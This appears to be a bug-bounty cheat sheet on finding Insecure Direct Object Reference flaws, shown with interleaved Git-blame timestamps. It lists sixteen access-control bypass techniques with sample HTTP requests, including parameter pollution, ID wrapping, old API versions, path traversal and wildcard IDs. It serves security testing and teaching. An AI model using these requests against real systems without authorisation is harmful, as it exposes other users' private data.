2021-02-09 02:15:31 +00:00
# Insecure Direct Object Reference (IDOR)
## **Introduction**
IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.
## **How to Find**
2020-09-04 10:41:20 +00:00
1. Add parameters onto the endpoints for example, if there was
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
GET /api/v1/getuser
[...]
```
Try this to bypass
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
GET /api/v1/getuser?id=1234
[...]
```
2. HTTP Parameter pollution
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
POST /api/get_profile
[...]
user_id=hacker_id& user_id=victim_id
```
3. Add .json to the endpoint
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
GET /v2/GetData/1234
[...]
```
Try this to bypass
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
GET /v2/GetData/1234.json
[...]
```
4. Test on outdated API Versions
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
POST /v2/GetData
[...]
id=123
```
Try this to bypass
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
POST /v1/GetData
[...]
id=123
```
5. Wrap the ID with an array.
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
POST /api/get_profile
[...]
{"user_id":111}
```
Try this to bypass
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
POST /api/get_profile
[...]
{"id":[111]}
```
6. Wrap the ID with a JSON object
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
POST /api/get_profile
[...]
{"user_id":111}
```
Try this to bypass
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
POST /api/get_profile
[...]
{"user_id":{"user_id":111}}
```
7. JSON Parameter Pollution
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
POST /api/get_profile
[...]
{"user_id":"hacker_id","user_id":"victim_id"}
```
8. Try decode the ID, if the ID encoded using md5,base64,etc
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
GET /GetUser/dmljdGltQG1haWwuY29t
[...]
```
dmljdGltQG1haWwuY29t => victim@mail.com
9. If the website using graphql, try to find IDOR using graphql!
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
GET /graphql
[...]
```
2021-02-09 02:15:31 +00:00
```
2020-09-04 10:41:20 +00:00
GET /graphql.php?query=
[...]
```
2020-09-04 10:46:10 +00:00
2021-02-09 02:15:31 +00:00
10. MFLAC (Missing Function Level Access Control)
2020-09-09 15:01:15 +00:00
```
GET /admin/profile
```
Try this to bypass
```
GET /ADMIN/profile
```
2021-02-09 13:58:04 +00:00
11. Try to swap uuid with number
```
GET /file?id=90ri2-xozifke-29ikedaw0d
```
Try this to bypass
```
GET /file?id=302
```
2021-06-24 23:13:39 +00:00
12. Change HTTP Method
```
GET /api/v1/users/profile/111
```
Try this to bypass
```
POST /api/v1/users/profile/111
```
13. Path traversal
```
GET /api/v1/users/profile/victim_id
```
Try this to bypass
```
GET /api/v1/users/profile/my_id/../victim_id
```
14. Change request content type
```
Content-type: application/xml
```
Try this to bypass
```
Content-type: application/json
```
15. Send wildcard instead of ID
```
GET /api/users/111
```
Try this to bypass
```
GET /api/users/*
```
16. Try google dorking to find new endpoint
2021-02-09 02:15:31 +00:00
Reference:
2021-02-09 13:58:04 +00:00
- [@swaysThinking ](https://twitter.com/swaysThinking ) and other medium writeup
